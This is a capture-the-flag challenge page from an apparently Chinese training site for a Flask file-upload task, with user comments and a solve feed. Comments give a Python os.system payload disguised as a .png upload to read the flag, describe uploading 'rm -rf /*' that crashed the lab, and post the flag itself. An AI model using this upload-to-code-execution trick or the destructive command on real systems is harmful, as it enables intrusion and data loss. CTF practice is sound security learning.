Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: ⎝Lazzaro⎠
一血奖励: 3金币
解  决: 11020
提  示:
描  述:
Flask_FileUpload
评论
zuoqirun 1年前

flag{1c6b553c3a91791993b859e1625275ac} rm -rf /*场景炸了

回复 5

uzzzzz 1年前

编写一个文件 test.py, 文件中的语句为: import os os.system('ls -lat ../') os.system('cat ../flag') 将文件名改成test.py.png, 在burpsuite中改包filename=test.png

回复 3

ttxs25830 2年前

草,我传了个rm -rf /* 上去,似乎没有都删掉,但是场景真炸了......

回复 6
GH0S7 1年前

hhhhhhhhhhhhhhhhhhhhhh

回复 0

bracket 2年前

oh.cool

回复 0

maomaoha1 2年前

Traceback (most recent call last) File "/usr/local/lib/python3.7/site-packages/flask/app.py", line 2464, in __call__ Open an interactive python shell in this framereturn self.wsgi_app(envi

回复 0

chengzhang 2年前

666

回复 0

·w· 2年前

我觉得好难啊

回复 2

nauyx 2年前

easy

回复 0

泡椒控卫 2年前

https://blog.csdn.net/m0_57954651/article/details/123335889?spm=1001.2014.3001.5501

回复 8

沐雨赏心 2年前

为什么我出现了这个 python3: can't open file '/app/upload/新建文本文档.jpg': [Errno 2] No such file or directory -->

回复 1
NYangY 2年前

文件名使用英文吧

回复 0

wangwenjie 2年前

在上传的jpg中写入,import os os.system('find /* |grep flag')来查找flag,之后在找到的内容中cat /flag就好了

回复 3

WriteUp

image
国家级划水运动员

3 金币

评分(19)

解题动态

1554701214 攻破了该题 11小时前
13627713954 攻破了该题 12小时前
viator 攻破了该题 12小时前
to5ny 攻破了该题 16小时前
小白出道 攻破了该题 17小时前
foamsn 攻破了该题 17小时前
Testman 攻破了该题 17小时前
2875517502 攻破了该题 18小时前
scicoc 攻破了该题 19小时前
star_evil 攻破了该题 19小时前
sscx_xxy 攻破了该题 19小时前
2276491734 攻破了该题 19小时前
salmon 攻破了该题 19小时前
林士仲11 攻破了该题 22小时前
19163302825 攻破了该题 23小时前
Dovir 攻破了该题 1天前
yqwapc001 攻破了该题 1天前
xiaodeng 攻破了该题 1天前
19953163917 攻破了该题 1天前
yitiaoxanyu123 攻破了该题 1天前